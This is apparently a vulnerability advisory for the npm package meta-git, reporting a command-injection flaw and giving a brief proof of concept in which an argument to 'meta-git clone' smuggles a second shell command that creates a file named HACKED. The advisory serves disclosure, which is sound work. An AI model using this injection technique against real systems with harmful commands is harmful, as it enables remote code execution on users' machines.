meta-git

vulnerability remote code execution
severity 3.8
language javascript
registry npm

Description

The meta-git module is vulnerable against command injection since the user-supplied inputs are concatenated with a command which is executed without validation.

POC

  1. Create a new directory and insert some test files:
mkdir tests
cd tests
touch test
touch secret
touch files
  1. Check there aren't files called HACKED
  2. Execute the following commands in another terminal:
npm i meta-git -g # Install affected module
meta-git clone 'sss||touch HACKED' # *HACKED* file is created
  1. Recheck the files: now HACKED has been created

References